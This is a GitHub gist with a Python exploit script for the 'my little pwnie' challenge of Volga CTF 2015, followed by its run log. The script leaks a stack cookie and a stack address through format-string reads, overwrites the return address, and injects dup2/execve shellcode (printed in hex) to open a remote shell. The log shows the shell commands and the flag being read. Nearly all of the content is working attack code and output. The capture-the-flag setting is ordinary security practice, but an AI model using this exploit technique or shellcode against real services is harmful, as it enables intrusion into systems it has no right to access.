Skip to content

Instantly share code, notes, and snippets.

@g05u
Created May 3, 2015 15:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save g05u/5be6f198fbde723ac178 to your computer and use it in GitHub Desktop.
Save g05u/5be6f198fbde723ac178 to your computer and use it in GitHub Desktop.
Exploit Little Pwnie VolgaCTF
#!/usr/bin/env python
import struct, sys, time, re
from nulllife import *
import requests, urllib
# Volga CTF 2015
# exploit my little pwnie
# www.null-life.com / @_g05u_
FD = 4
s = NullSocket('pwnie.2015.volgactf.ru', 7777)
#s = NullSocket('kali64', 1337)
shellcode = NullShell('dup2').get(FD) + NullShell('exec').get()
shellcode = shellcode.rjust(58, '\x90')
print s.readuntil('back: ')
s.writeline('0x%26$08x')
cookie = int(s.readline()[6:-1], 16)
print '[*] Cookie: 0x%08x' % cookie
s.readuntil('back: ')
s.writeline('0x%6$08x')
shellcode_addr = int(s.readline()[6:-1], 16) - 0x70
print '[*] Shellcode Address: 0x%08x' % shellcode_addr
print '[*] Overwrite RET'
s.readuntil('back: ')
s.write('%138x' + 'A' * 16 + struct.pack('<I', shellcode_addr) + chr(FD)) #overwrite ret
print '[*] Overwrite cookie'
s.readuntil('back: ')
s.write('%122x' + struct.pack('<I', cookie + 1) + '\x00') #overwrite cookie
print '[*] Overwrite null byte in cookie'
s.readuntil('back: ')
s.write('%122x') #set null byte in cookie
print '[*] Write shellcode'
s.readuntil('back: ')
print '[!] Shellcode: %s' % shellcode.encode('hex')
s.write(shellcode + '\x00') #set null byte in cookie
print '[***] Got shell!!!'
s.interactive()
'''
$ python xpl_pony.py
This is a simple echo server. Type exit to quit.
Type string to echo back:
[*] Cookie: 0x5b1a5400
[*] Shellcode Address: 0xffcadbfc
[*] Overwrite RET
[*] Overwrite cookie
[*] Overwrite null byte in cookie
[*] Write shellcode
[!] Shellcode: 909090909090909090909090909090909031db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
[***] Got shell!!!
I strip this awful symbol
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ls -la
total 908
drwxrwxr-x 2 ubuntu ubuntu 4096 May 3 05:33 .
drwxr-xr-x 5 ubuntu ubuntu 4096 May 3 05:24 ..
-rwxrwxr-x 1 ubuntu ubuntu 9720 May 3 05:24 my_little_pwnie
-rw-rw-r-- 1 ubuntu ubuntu 28 May 3 05:24 you_can_find_flag_in_this_file.txt
-rw-r--r-- 1 root root 900476 May 3 10:52 zzz_logs
cat you_can_find_flag_in_this_file.txt
flag{fmt_string+bof=exploit}
exit
*** Connection closed by remote host ***
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment